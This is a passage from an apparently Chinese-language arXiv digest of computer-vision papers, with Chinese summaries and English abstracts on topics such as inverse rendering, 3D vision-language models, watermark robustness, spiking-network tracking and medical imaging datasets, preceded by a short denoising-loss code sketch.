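SPROUT 通过去噪学习表征,其像素空间的去噪训练目标可用如下简化代码示意(笔者补充;alpha_bar 噪声水平与 predict_eps 预测器均为假设,真实模型是无 VAE 的像素空间扩散 Transformer):

```python
import numpy as np

def denoising_loss(x, predict_eps, alpha_bar, rng):
    """Pixel-space denoising objective (sketch): corrupt the clean image
    with Gaussian noise at level alpha_bar and regress that noise.
    `predict_eps` stands in for the pixel-space diffusion transformer."""
    eps = rng.standard_normal(x.shape)
    x_t = np.sqrt(alpha_bar) * x + np.sqrt(1.0 - alpha_bar) * eps
    return np.mean((predict_eps(x_t) - eps) ** 2)

rng = np.random.default_rng(0)
x = rng.standard_normal((8, 8))   # a stand-in "image"

def zero_predictor(x_t):
    return np.zeros_like(x_t)     # trivial baseline predictor

loss = denoising_loss(x, zero_predictor, alpha_bar=0.5, rng=rng)
print(loss)
```

对恒零的平凡预测器,损失约等于噪声方差(≈1);训练即是让网络学会从带噪像素中回归噪声,从而在无标签农业图像上获得结构感知的表征。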
[CV-162] SGS-Intrinsic: Semantic-Invariant Gaussian Splatting for Sparse-View Indoor Inverse Rendering CVPR2026
【速读】:该论文旨在解决现有基于3D高斯泼溅(3D Gaussian Splatting, 3DGS)的室内逆渲染(inverse rendering)方法在稀疏视图(sparse-view)条件下失效的问题,尤其是这些方法通常聚焦于物体中心重建,在有限视角下难以实现高质量几何重建和材质-光照解耦。解决方案的关键在于构建一个由语义与几何先验引导的密集且几何一致的高斯语义场(Gaussian semantic field),为后续逆渲染提供可靠基础;在此基础上,通过融合混合光照模型与材质先验实现材质与光照的有效解耦,并引入光照不变材质约束及去阴影模型以缓解投射阴影对材质恢复的影响,从而提升整体逆渲染的鲁棒性与精度。
链接: https://arxiv.org/abs/2603.27516
作者: Jiahao Niu,Rongjia Zheng,Wenju Xu,WeiShi Zheng,Qing Zhang
机构: Sun Yat-sen University (中山大学); Amazon (亚马逊)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR2026
Abstract:We present SGS-Intrinsic, an indoor inverse rendering framework that works well for sparse-view images. Unlike existing 3D Gaussian Splatting (3DGS) based methods that focus on object-centric reconstruction and fail to work under sparse-view settings, our method achieves high-quality geometry reconstruction and accurate disentanglement of material and illumination. The core idea is to construct a dense and geometry-consistent Gaussian semantic field guided by semantic and geometric priors, providing a reliable foundation for subsequent inverse rendering. Building upon this, we perform material-illumination disentanglement by combining a hybrid illumination model and a material prior to effectively capture illumination-material interactions. To mitigate the impact of cast shadows and enhance the robustness of material recovery, we introduce an illumination-invariant material constraint together with a deshadowing model. Extensive experiments on benchmark datasets show that our method consistently improves both reconstruction fidelity and inverse rendering quality over existing 3DGS-based inverse rendering approaches. Our code is available at this https URL.
[CV-163] Understanding Semantic Perturbations on In-Processing Generative Image Watermarks
【速读】:该论文旨在解决生成式 AI (Generative AI) 中内容溯源与认证机制在面对语义漂移(semantic drift)时的鲁棒性不足问题。当前主流的内嵌水印(in-processing watermarking)方法虽被证明对常规后处理操作(如几何变换和滤波)具有鲁棒性,但对保留视觉质量的同时改变高阶场景语义内容的编辑行为缺乏系统评估。其解决方案的关键在于提出一个多阶段、模块化的压力测试框架,利用现成的物体检测、掩码生成和语义引导修复/重生成模型,实现可控且语义意义发生改变的图像编辑,从而系统性地检验水印在语义扰动下的稳定性。实验表明,水印鲁棒性与其语义纠缠程度密切相关,许多现有方法在语义编辑下检测率骤降至接近零,揭示了当前水印评估体系的重大盲区,并强调未来设计需明确考虑对抗语义操纵的能力。
链接: https://arxiv.org/abs/2603.27513
作者: Anirudh Nakra,Min Wu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:The widespread deployment of high-fidelity generative models has intensified the need for reliable mechanisms for provenance and content authentication. In-processing watermarking, embedding a signature into the generative model’s synthesis procedure, has been advocated as a solution and is often reported to be robust to standard post-processing (such as geometric transforms and filtering). Yet robustness to semantic manipulations that alter high-level scene content while maintaining reasonable visual quality is not well studied or understood. We introduce a simple, multi-stage framework for systematically stress-testing in-processing generative watermarks under semantic drift. The framework utilizes off-the-shelf models for object detection, mask generation, and semantically guided inpainting or regeneration to produce controlled, meaning-altering edits with minimal perceptual degradation. Based on extensive experiments on representative schemes, we find that robustness varies significantly with the degree of semantic entanglement: methods by which watermarks remain detectable under a broad suite of conventional perturbations can fail under semantic edits, with watermark detectability in many cases dropping to near zero while image quality remains high. Overall, our results reveal a critical gap in current watermarking evaluations and suggest that watermark designs and benchmarking must explicitly account for robustness against semantic manipulation.
[CV-164] Chat-Scene: Exploiting Context-Rich Object Identification for 3D LLM
【速读】:该论文旨在解决多模态大语言模型(Multi-modal Large Language Models, MLLMs)在3D场景理解中面临的细粒度物体定位(fine-grained object grounding)与上下文推理能力不足的问题,从而限制其对复杂3D环境的解析与交互能力。解决方案的关键在于提出Chat-Scene++框架,通过将3D场景表示为富含语义信息的物体序列(context-rich object sequences),实现以物体为中心的表征与推理;该框架利用大规模预训练的3D场景级和2D图像级编码器提取具有上下文感知能力的物体特征,替代传统孤立的单物体特征,并支持基于物体标识符的链式思维(grounded chain-of-thought, G-CoT)推理,使模型能够在类别和空间两个维度上区分对象,进而无需任务特定头或微调即可在五个主流3D视觉语言基准上达到最先进性能。
链接: https://arxiv.org/abs/2603.27507
作者: Haifeng Huang,Yilun Chen,Zehan Wang,Jiangmiao Pang,Zhou Zhao
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Recent advancements in multi-modal large language models (MLLMs) have shown strong potential for 3D scene understanding. However, existing methods struggle with fine-grained object grounding and contextual reasoning, limiting their ability to interpret and interact with complex 3D environments. In this paper, we present Chat-Scene++, an MLLM framework that represents 3D scenes as context-rich object sequences. By structuring scenes as sequences of objects with contextual semantics, Chat-Scene++ enables object-centric representation and interaction. It decomposes a 3D scene into object representations paired with identifier tokens, allowing LLMs to follow instructions across diverse 3D vision-language tasks. To capture inter-object relationships and global semantics, Chat-Scene++ extracts context-rich object features using large-scale pre-trained 3D scene-level and 2D image-level encoders, unlike the isolated per-object features in Chat-Scene. Its flexible object-centric design also supports grounded chain-of-thought (G-CoT) reasoning, enabling the model to distinguish objects at both category and spatial levels during multi-step inference. Without the need for additional task-specific heads or fine-tuning, Chat-Scene++ achieves state-of-the-art performance on five major 3D vision-language benchmarks: ScanRefer, Multi3DRefer, Scan2Cap, ScanQA, and SQA3D. These results highlight its effectiveness in scene comprehension, object grounding, and spatial reasoning. Additionally, without reconstructing 3D worlds through computationally expensive processes, we demonstrate its applicability to real-world scenarios using only 2D inputs.
[CV-165] Transferring Physical Priors into Remote Sensing Segmentation via Large Language Models
【速读】:该论文旨在解决遥感影像语义分割中因依赖空间对齐数据和昂贵的重新训练而难以融合多源物理变量(如数字高程模型、合成孔径雷达和归一化植被指数)的问题。其解决方案的关键在于提出一种以物理先验为中心的知识图谱(Physical-Centric Knowledge Graph, PCKG),通过大语言模型从1,763个词汇中提取物理先验,构建异构且空间对齐的数据集Phy-Sky-SA,并设计PriorSeg模型,采用视觉-物理联合训练策略与新颖的物理一致性损失函数,在不重新训练基础模型的前提下显著提升分割精度与物理合理性。
链接: https://arxiv.org/abs/2603.27504
作者: Yuxi Lu,Kunqi Li,Zhidong Li,Xiaohan Su,Biao Wu,Chenya Huang,Bin Liang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Semantic segmentation of remote sensing imagery is fundamental to Earth observation. Achieving accurate results requires integrating not only optical images but also physical variables such as the Digital Elevation Model (DEM), Synthetic Aperture Radar (SAR) and Normalized Difference Vegetation Index (NDVI). Recent foundation models (FMs) leverage pre-training to exploit these variables but still depend on spatially aligned data and costly retraining when involving new sensors. To overcome these limitations, we introduce a novel paradigm for integrating domain-specific physical priors into segmentation models. We first construct a Physical-Centric Knowledge Graph (PCKG) by prompting large language models to extract physical priors from 1,763 vocabularies, and use it to build a heterogeneous, spatial-aligned dataset, Phy-Sky-SA. Building on this foundation, we develop PriorSeg, a physics-aware residual refinement model trained with a joint visual-physical strategy that incorporates a novel physics-consistency loss. Experiments on heterogeneous settings demonstrate that PriorSeg improves segmentation accuracy and physical plausibility without retraining the FMs. Ablation studies verify the effectiveness of the Phy-Sky-SA dataset, the PCKG, and the physics-consistency loss.
[CV-166] Streamlined Open-Vocabulary Human-Object Interaction Detection
【速读】:该论文旨在解决开放词汇人类-物体交互(Open-vocabulary Human-Object Interaction, HOI)检测中因跨模型表示差异导致的特征融合难题。现有方法通常依赖传统HOI检测器与视觉语言模型(Vision-Language Model, VLM)协同工作以识别训练阶段未见的HOI类别,但受限于两者在特征空间上的显著差异,难以实现高效融合。其解决方案的关键在于提出SL-HOI框架,该框架完全基于强大的DINOv3模型构建,充分利用其主干网络进行细粒度定位和文本对齐视觉头(text-aligned vision head)进行开放词汇交互分类;并通过将交互查询(interaction queries)与主干图像token同时输入视觉头,有效弥合二者间的表征鸿沟,从而实现平滑的跨注意力机制。整个模型仅引入少量可学习参数且冻结DINOv3所有参数,实现了快速适应HOI任务并取得SOTA性能。
链接: https://arxiv.org/abs/2603.27500
作者: Chang Sun,Dongliang Liao,Changxing Ding
机构: South China University of Technology (华南理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Open-vocabulary human-object interaction (HOI) detection aims to localize and recognize all human-object interactions in an image, including those unseen during training. Existing approaches usually rely on the collaboration between a conventional HOI detector and a Vision-Language Model (VLM) to recognize unseen HOI categories. However, feature fusion in this paradigm is challenging due to significant gaps in cross-model representations. To address this issue, we introduce SL-HOI, a StreamLined open-vocabulary HOI detection framework based solely on the powerful DINOv3 model. Our design leverages the complementary strengths of DINOv3’s components: its backbone for fine-grained localization and its text-aligned vision head for open-vocabulary interaction classification. Moreover, to facilitate smooth cross-attention between the interaction queries and the vision head’s output, we propose first feeding both the interaction queries and the backbone image tokens into the vision head, effectively bridging their representation gaps. All DINOv3 parameters in our approach are frozen, with only a small number of learnable parameters added, allowing a fast adaptation to the HOI detection task. Extensive experiments show that SL-HOI achieves state-of-the-art performance on both the SWiG-HOI and HICO-DET benchmarks, demonstrating the effectiveness of our streamlined model architecture. Code is available at this https URL.
[CV-167] Learning to Focus and Precise Cropping: A Reinforcement Learning Framework with Information Gaps and Grounding Loss for MLLMs
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在复杂视觉场景中对细粒度视觉信息感知与推理能力不足的问题,尤其关注模型在使用图像裁剪工具进行区域分析时对裁剪区域细节依赖较弱、过度依赖全局图像输入的局限性。解决方案的关键在于提出一种无需轨迹监督的两阶段强化学习框架:第一阶段引入“信息缺口”(Information Gap)机制,通过调整全局图像的粒度,引导模型基于裁剪区域的信息增益来回答问题;第二阶段通过引入少量边界框标注的接地损失(grounding loss),进一步提升裁剪精度。该方法显著增强了模型对裁剪区域的关注,从而在高分辨率视觉问答基准上达到当前最优性能。
链接: https://arxiv.org/abs/2603.27494
作者: Xuanpu Zhao,Zhentao Tan,Dianmo Sheng,Tianxiang Chen,Yao Liu,Yue Wu,Tao Gong,Qi Chu,Nenghai Yu
机构: School of Cyber Science and Technology, University of Science and Technology of China (中国科学技术大学网络科学与技术学院); Anhui Province Key Laboratory of Digital Security (安徽省数字安全重点实验室)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:To enhance the perception and reasoning capabilities of multimodal large language models in complex visual scenes, recent research has introduced agent-based workflows. In these works, MLLMs autonomously utilize image cropping tool to analyze regions of interest for question answering. While existing training strategies, such as those employing supervised fine-tuning and reinforcement learning, have made significant progress, our empirical analysis reveals a key limitation. We demonstrate the model’s strong reliance on global input and its weak dependence on the details within the cropped region. To address this issue, we propose a novel two-stage reinforcement learning framework that does not require trajectory supervision. In the first stage, we introduce the ``Information Gap" mechanism by adjusting the granularity of the global image. This mechanism trains the model to answer questions by focusing on cropped key regions, driven by the information gain these regions provide. The second stage further enhances cropping precision by incorporating a grounding loss, using a small number of bounding box annotations. Experiments show that our method significantly enhances the model’s attention to cropped regions, enabling it to achieve state-of-the-art performance on high-resolution visual question-answering benchmarks. Our method provides a more efficient approach for perceiving and reasoning fine-grained details in MLLMs. Code is available at: this https URL.
[CV-168] Fully Spiking Neural Networks with Target Awareness for Energy-Efficient UAV Tracking
【速读】:该论文旨在解决现有基于脉冲神经网络(Spiking Neural Networks, SNNs)的无人机(UAV)视觉跟踪方法严重依赖昂贵事件相机的问题,从而限制了其在资源受限的无人机平台上的部署。解决方案的关键在于提出STATrack——一种仅使用RGB输入的全脉冲神经网络框架,首次将SNN应用于UAV视觉跟踪任务。为缓解背景token对目标特征的干扰,作者进一步提出自适应最大化模板与特征之间的互信息(mutual information),从而提升目标表征能力并保持低功耗特性。
链接: https://arxiv.org/abs/2603.27493
作者: Pengzhi Zhong,Jiwei Mo,Dan Zeng,Feixiang He,Shuiwang Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Spiking Neural Networks (SNNs), characterized by their event-driven computation and low power consumption, have shown great potential for energy-efficient visual tracking on unmanned aerial vehicles (UAVs). However, existing efficient SNN-based trackers heavily rely on costly event cameras, limiting their deployment on UAVs. To address this limitation, we propose STATrack, an efficient fully spiking neural network framework for UAV visual tracking using RGB inputs only. To the best of our knowledge, this work is the first to investigate spiking neural networks for UAV visual tracking tasks. To mitigate the weakening of target features by background tokens, we propose adaptively maximizing the mutual information between templates and features. Extensive experiments on four widely used UAV tracking benchmarks demonstrate that STATrack achieves competitive tracking performance while maintaining low energy consumption.
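摘要提到通过自适应最大化模板与特征之间的互信息来抑制背景token对目标特征的干扰。其具体损失形式未在摘要中给出,下面用纯 Python 给出一个 InfoNCE 式互信息下界估计的最小示意(函数 `info_nce`、相似度矩阵 `sim` 均为本文为说明而设的假设接口,并非论文原始实现):

```python
import math

def info_nce(sim, temperature=1.0):
    """InfoNCE 式互信息下界估计的示意实现。

    sim[i][j] 表示模板 i 与特征 j 的相似度,约定对角线为匹配的正样本对。
    返回各行 -log softmax(正样本) 的平均值;该值越小,模板与对应特征越"互信息丰富"。
    """
    n = len(sim)
    losses = []
    for i in range(n):
        logits = [sim[i][j] / temperature for j in range(n)]
        m = max(logits)  # log-sum-exp 数值稳定化
        log_denom = m + math.log(sum(math.exp(l - m) for l in logits))
        losses.append(log_denom - logits[i])
    return sum(losses) / n
```

当对角线相似度明显高于非对角线时损失较小;当相似度完全无区分度时,损失退化为 log N,即模板与特征之间不携带可辨别信息。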
[CV-169] Estimating the Impact of COVID-19 on Travel Demand in Houston Area Using Deep Learning and Satellite Imagery
【速读】:该论文旨在解决城市交通需求估算中传统数据获取方式受限的问题,尤其在突发公共卫生事件(如新冠疫情)期间,常规出行数据难以及时、准确反映真实交通活动变化。解决方案的关键在于利用高分辨率卫星遥感影像(地面采样距离GSD约为15–30 cm)结合先进的计算机视觉算法(如Detectron2和Faster R-CNN),构建车辆计数模型,对特定地点(如大学、购物中心、社区广场、餐厅和超市)的车辆数量进行自动识别与统计分析。该方法能够有效捕捉疫情前后交通行为的变化趋势,从而为交通管理部门提供可靠、实时的出行需求与经济活动监测指标。
链接: https://arxiv.org/abs/2603.27486
作者: Alekhya Pachika,Lu Gao,Lingguang Song,Pan Lu,Xingju Wang
机构: University of Houston (休斯顿大学); North Dakota State University (北达科他州立大学); Shijiazhuang Tiedao University (石家庄铁道大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Applications (stat.AP)
备注:
Abstract:Considering recent advances in remote sensing satellite systems and computer vision algorithms, many satellite sensing platforms and sensors have been used to monitor the condition and usage of transportation infrastructure systems. The level of details that can be detected increases significantly with the increase of ground sample distance (GSD), which is around 15 cm - 30 cm for high-resolution satellite images. In this study, we analyzed data acquired from high-resolution satellite imagery to provide insights, predictive signals, and trend for travel demand estimation. More specifically, we estimate the impact of COVID-19 in the metropolitan area of Houston using satellite imagery from Google Earth Engine datasets. We developed a car-counting model through Detectron2 and Faster R-CNN to monitor the presence of cars within different locations (i.e., university, shopping mall, community plaza, restaurant, supermarket) before and during the COVID-19. The results show that the number of cars detected at these selected locations reduced on average 30% in 2020 compared with the previous year 2019. The results also show that satellite imagery provides rich information for travel demand and economic activity estimation. Together with advanced computer vision and deep learning algorithms, it can generate reliable and accurate information for transportation agency decision makers.
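摘要中"2020 年较 2019 年所选地点车辆数平均下降约 30%"这类结论,可由各地点前后两年的车辆计数直接算得。以下纯 Python 示意演示该统计的计算方式(函数名 `avg_reduction` 与示例计数均为本文假设,并非论文原始数据):

```python
def avg_reduction(counts_before, counts_after):
    """按地点计算车辆数的相对下降比例,再对所有地点取平均。

    counts_before / counts_after: 各地点在前后两个时期检测到的车辆数。
    返回值为 0~1 之间的平均下降比例。
    """
    reductions = [(a - b) / a for a, b in zip(counts_before, counts_after)]
    return sum(reductions) / len(reductions)
```

例如某两处地点 2019 年检出 100 辆与 50 辆,2020 年降为 70 辆与 35 辆,则平均下降比例为 0.3,即论文所述量级的一个假设性示例。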
[CV-170] Difference Feedback: Generating Multimodal Process-Level Supervision for VLM Reinforcement Learning
【速读】:该论文旨在解决视觉-语言模型(Vision-Language Models, VLMs)在基于Group Relative Policy Optimization (GRPO)风格训练时,因仅依赖终端奖励而导致多步推理中信用分配稀疏的问题,进而削弱了视觉证据与中间推理步骤之间的关联性,常引发优化不稳定和视觉幻觉现象。解决方案的关键在于提出差分反馈(Differential Feedback)机制,该机制通过修复错误的推理轨迹自动构建token/step级别的监督掩码,显式标记出需要修正的关键位置,从而实现无需大规模人工标注的逐过程视觉对齐,并可无缝集成至现有GRPO类框架中。
链接: https://arxiv.org/abs/2603.27482
作者: Fei Ding,Yongkang Zhang,Yuhao Liao,Zijian Zeng,Chunzheng Zhu,Yaozong Zheng,Yafei Liu,Yeling Peng,Youwei Wang,Sibo Wang,Huiming Yang,Linglin Liao,Shunzhi Yang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Vision–language models (VLMs) are increasingly aligned via Group Relative Policy Optimization (GRPO)-style training. However, relying solely on terminal outcome rewards yields sparse credit assignment in multi-step reasoning, weakening the linkage between visual evidence and intermediate steps and often causing unstable optimization and visual hallucinations. We propose Differential Feedback, which automatically constructs token/step-level supervision masks by repairing erroneous reasoning trajectories, explicitly marking the key positions that require correction. Without costly large-scale step-by-step human annotations, our method enables process-level visual alignment and can be seamlessly integrated into existing GRPO-like frameworks. Experiments on multimodal reasoning benchmarks including MMMStar and MathVista show an average 3% improvement under matched compute budgets. Our approach offers an effective, low-cost solution for accurate vision–reasoning process alignment.
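论文通过"修复错误推理轨迹"来自动构造 token/step 级监督掩码,标记需要更正的关键位置,具体实现未公开。下面给出一个基于序列对齐差异的最小示意(函数与接口均为本文假设):用标准库 `difflib.SequenceMatcher` 对比错误轨迹与修复后轨迹,将修复轨迹中被更正或新增的 token 位置标为 1:

```python
import difflib

def supervision_mask(erroneous, repaired):
    """对比错误轨迹与修复后轨迹,生成 token 级监督掩码的示意实现。

    erroneous / repaired: 两条推理轨迹的 token 列表。
    返回与 repaired 等长的 0/1 掩码,1 表示该位置是修复引入的关键 token。
    """
    mask = [0] * len(repaired)
    sm = difflib.SequenceMatcher(a=erroneous, b=repaired)
    for tag, i1, i2, j1, j2 in sm.get_opcodes():
        if tag != 'equal':  # replace / insert 等非一致片段即为被修复的位置
            for j in range(j1, j2):
                mask[j] = 1
    return mask
```

得到的掩码即可作为逐位置的信用分配权重叠加到 GRPO 式奖励上,使优化聚焦于被更正的推理步骤。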
[CV-171] Project Imaging-X: A Survey of 1000 Open-Access Medical Imaging Datasets for Foundation Model Development
【速读】:该论文旨在解决医学影像领域缺乏大规模、统一且高质量数据集的问题,这限制了强大医学基础模型(Medical Foundation Models)的发展。当前医学图像数据集规模有限、任务细分且分布不均,难以支撑通用性强和鲁棒性高的模型训练。其解决方案的关键在于提出一种基于元数据驱动的融合范式(Metadata-driven Fusion Paradigm, MDFP),通过整合具有相同模态或任务的多个公共数据集,将分散的小型数据孤岛转化为更大、更连贯的数据资源;在此基础上构建了一个交互式发现门户与结构化数据表,实现了端到端自动化数据集成与高效访问,为医学影像数据的规模化整合提供了可操作路径。
链接: https://arxiv.org/abs/2603.27460
作者: Zhongying Deng,Cheng Tang,Ziyan Huang,Jiashi Lin,Ying Chen,Junzhi Ning,Chenglong Ma,Jiyao Liu,Wei Li,Yinghao Zhu,Shujian Gao,Yanyan Huang,Sibo Ju,Yanzhou Su,Pengcheng Chen,Wenhao Tang,Tianbin Li,Haoyu Wang,Yuanfeng Ji,Hui Sun,Shaobo Min,Liang Peng,Feilong Tang,Haochen Xue,Rulin Zhou,Chaoyang Zhang,Wenjie Li,Shaohao Rui,Weijie Ma,Xingyue Zhao,Yibin Wang,Kun Yuan,Zhaohui Lu,Shujun Wang,Jinjie Wei,Lihao Liu,Dingkang Yang,Lin Wang,Yulong Li,Haolin Yang,Yiqing Shen,Lequan Yu,Xiaowei Hu,Yun Gu,Yicheng Wu,Benyou Wang,Minghui Zhang,Angelica I. Aviles-Rivero,Qi Gao,Hongming Shan,Xiaoyu Ren,Fang Yan,Hongyu Zhou,Haodong Duan,Maosong Cao,Shanshan Wang,Bin Fu,Xiaomeng Li,Zhi Hou,Chunfeng Song,Lei Bai,Yuan Cheng,Yuandong Pu,Xiang Li,Wenhai Wang,Hao Chen,Jiaxin Zhuang,Songyang Zhang,Huiguang He,Mengzhang Li,Bohan Zhuang,Zhian Bai,Rongshan Yu,Liansheng Wang,Yukun Zhou,Xiaosong Wang,Xin Guo,Guanbin Li,Xiangru Lin,Dakai Jin,Mianxin Liu,Wenlong Zhang,Qi Qin,Conghui He,Yuqiang Li,Ye Luo,Nanqing Dong,Jie Xu,Wenqi Shao,Bo Zhang,Qiujuan Yan,Yihao Liu,Jun Ma,Zhi Lu,Yuewen Cao,Zongwei Zhou,Jianming Liang,Shixiang Tang,Qi Duan,Dongzhan Zhou
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 157 pages, 19 figures, 26 tables. Project repo: \url{ this https URL }
Abstract:Foundation models have demonstrated remarkable success across diverse domains and tasks, primarily due to the thrive of large-scale, diverse, and high-quality datasets. However, in the field of medical imaging, the curation and assembling of such medical datasets are highly challenging due to the reliance on clinical expertise and strict ethical and privacy constraints, resulting in a scarcity of large-scale unified medical datasets and hindering the development of powerful medical foundation models. In this work, we present the largest survey to date of medical image datasets, covering over 1,000 open-access datasets with a systematic catalog of their modalities, tasks, anatomies, annotations, limitations, and potential for integration. Our analysis exposes a landscape that is modest in scale, fragmented across narrowly scoped tasks, and unevenly distributed across organs and modalities, which in turn limits the utility of existing medical image datasets for developing versatile and robust medical foundation models. To turn fragmentation into scale, we propose a metadata-driven fusion paradigm (MDFP) that integrates public datasets with shared modalities or tasks, thereby transforming multiple small data silos into larger, more coherent resources. Building on MDFP, we release an interactive discovery portal that enables end-to-end, automated medical image dataset integration, and compile all surveyed datasets into a unified, structured table that clearly summarizes their key characteristics and provides reference links, offering the community an accessible and comprehensive repository. By charting the current terrain and offering a principled path to dataset consolidation, our survey provides a practical roadmap for scaling medical imaging corpora, supporting faster data discovery, more principled dataset creation, and more capable medical foundation models.
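MDFP 的核心思路是按共享元数据(模态、任务等)把分散的小数据集聚合成更大的数据池。其工程实现未在摘要中给出,以下是一个仅用 Python 标准库的最小示意(字段名 `modality`/`task`/`name` 为本文假设的元数据模式):

```python
from collections import defaultdict

def fuse_by_metadata(datasets, keys=("modality", "task")):
    """按共享元数据字段把数据集分组融合的示意实现。

    datasets: 每项为一条数据集元数据记录(字典)。
    返回 {(模态, 任务): [数据集名, ...]},同组数据集即可合并为更大的训练池。
    """
    pools = defaultdict(list)
    for d in datasets:
        pools[tuple(d[k] for k in keys)].append(d["name"])
    return dict(pools)
```

例如两个 CT 分割数据集会落入同一个池,而 MRI 分类数据集单独成池;真实系统还需处理标注格式对齐、去重等问题,此处仅示意分组这一步。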
[CV-172] From None to All: Self-Supervised 3D Reconstruction via Novel View Synthesis
【速读】:该论文旨在解决无监督(self-supervised)3D重建中缺乏真实标注数据和预训练先验知识时,如何同时学习显式三维几何结构与相机参数的问题。其核心挑战在于从未校准、未定位的图像序列中实现稳定且高质量的3D重建。解决方案的关键在于提出NAS3R框架,该框架通过一个共享的Transformer主干网络整合3D高斯表示的重建任务与相机参数预测任务,并利用掩码注意力机制约束优化过程;同时采用基于深度的高斯建模方式提升优化条件数,从而在仅有2D光度监督下实现端到端自监督训练,无需任何真值标注或预训练模型即可获得优于现有方法的重建性能。
链接: https://arxiv.org/abs/2603.27455
作者: Ranran Huang,Weixun Luo,Ye Mao,Krystian Mikolajczyk
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:In this paper, we introduce NAS3R, a self-supervised feed-forward framework that jointly learns explicit 3D geometry and camera parameters with no ground-truth annotations and no pretrained priors. During training, NAS3R reconstructs 3D Gaussians from uncalibrated and unposed context views and renders target views using its self-predicted camera parameters, enabling self-supervised training from 2D photometric supervision. To ensure stable convergence, NAS3R integrates reconstruction and camera prediction within a shared transformer backbone regulated by masked attention, and adopts a depth-based Gaussian formulation that facilitates well-conditioned optimization. The framework is compatible with state-of-the-art supervised 3D reconstruction architectures and can incorporate pretrained priors or intrinsic information when available. Extensive experiments show that NAS3R achieves superior results to other self-supervised methods, establishing a scalable and geometry-aware paradigm for 3D reconstruction from unconstrained data. Code and models are publicly available at this https URL.
[CV-173] LOME: Learning Human-Object Manipulation with Action-Conditioned Egocentric World Model
【速读】:该论文旨在解决人类-物体操作(human-object manipulation)在生成式视频建模中面临的挑战,尤其是动作精细性与接触丰富性导致的物理合理性不足、泛化能力差以及难以扩展至真实环境的问题。传统基于物理的动画方法依赖大量手工建模且无法适应多样化物体形态和复杂场景,而现有图像或视频生成模型在动作跟随准确性与时空一致性方面表现有限。解决方案的关键在于提出LOME(egocentric world model),其通过联合估计空间中的人体动作(包括身体姿态和手部手势)与环境上下文,在预训练视频生成模型基础上进行微调,从而实现以输入图像、文本提示及每帧动作作为条件生成高质量、具物理合理性的交互视频。该方法显著提升了动作遵循精度、跨场景泛化能力和手-物交互的物理真实性,为增强现实/虚拟现实(AR/VR)体验与可扩展机器人训练提供了新路径。
链接: https://arxiv.org/abs/2603.27449
作者: Quankai Gao,Jiawei Yang,Qiangeng Xu,Le Chen,Yue Wang
机构: University of Southern California (南加州大学); Max Planck Institute for Intelligent Systems (马克斯·普朗克智能系统研究所); Waymo (Waymo)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Learning human-object manipulation presents significant challenges due to its fine-grained and contact-rich nature of the motions involved. Traditional physics-based animation requires extensive modeling and manual setup, and more importantly, it neither generalizes well across diverse object morphologies nor scales effectively to real-world environment. To address these limitations, we introduce LOME, an egocentric world model that can generate realistic human-object interactions as videos conditioned on an input image, a text prompt, and per-frame human actions, including both body poses and hand gestures. LOME injects strong and precise action guidance into object manipulation by jointly estimating spatial human actions and the environment contexts during training. After finetuning a pretrained video generative model on videos of diverse egocentric human-object interactions, LOME demonstrates not only high action-following accuracy and strong generalization to unseen scenarios, but also realistic physical consequences of hand-object interactions, e.g., liquid flowing from a bottle into a mug after executing a ``pouring’’ action. Extensive experiments demonstrate that our video-based framework significantly outperforms state-of-the-art image based and video-based action-conditioned methods and Image/Text-to-Video (I/T2V) generative model in terms of both temporal consistency and motion control. LOME paves the way for photorealistic AR/VR experiences and scalable robotic training, without being limited to simulated environments or relying on explicit 3D/4D modeling.
[CV-174] Evaluating Large and Lightweight Vision Models for Irregular Component Segmentation in E-Waste Disassembly
【速读】:该论文旨在解决电子废弃物(e-waste)回收中不规则且密集排列组件的精确分割问题,以支持机器人拆解和材料回收。其解决方案的关键在于对比分析不同模型架构与规模对分割性能的影响,发现轻量级YOLOv8网络在精度(mAP50 = 98.8%,mAP50-95 = 85%)和边界定位能力上显著优于基于Transformer的大规模预训练模型SAM2(mAP50 = 8.4%),并指出大型预训练模型需进行任务特定优化才能适配工业场景。研究还构建了包含1,456张标注RGB图像的新数据集及基准测试框架,为可扩展的视觉算法开发提供了基础。
链接: https://arxiv.org/abs/2603.27441
作者: Xinyao Zhang,Chang Liu,Xiao Liang,Minghui Zheng,Sara Behdad
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted at ASME MSEC2026
Abstract:Precise segmentation of irregular and densely arranged components is essential for robotic disassembly and material recovery in electronic waste (e-waste) recycling. This study evaluates the impact of model architecture and scale on segmentation performance by comparing SAM2, a transformer-based vision model, with the lightweight YOLOv8 network. Both models were trained and tested on a newly collected dataset of 1,456 annotated RGB images of laptop components including logic boards, heat sinks, and fans, captured under varying illumination and orientation conditions. Data augmentation techniques, such as random rotation, flipping, and cropping, were applied to improve model robustness. YOLOv8 achieved higher segmentation accuracy (mAP50 = 98.8%, mAP50-95 = 85%) and stronger boundary precision than SAM2 (mAP50 = 8.4%). SAM2 demonstrated flexibility in representing diverse object structures but often produced overlapping masks and inconsistent contours. These findings show that large pre-trained models require task-specific optimization for industrial applications. The resulting dataset and benchmarking framework provide a foundation for developing scalable vision algorithms for robotic e-waste disassembly and circular manufacturing systems.
[CV-175] SpatialStack: Layered Geometry-Language Fusion for 3D VLM Spatial Reasoning CVPR2026
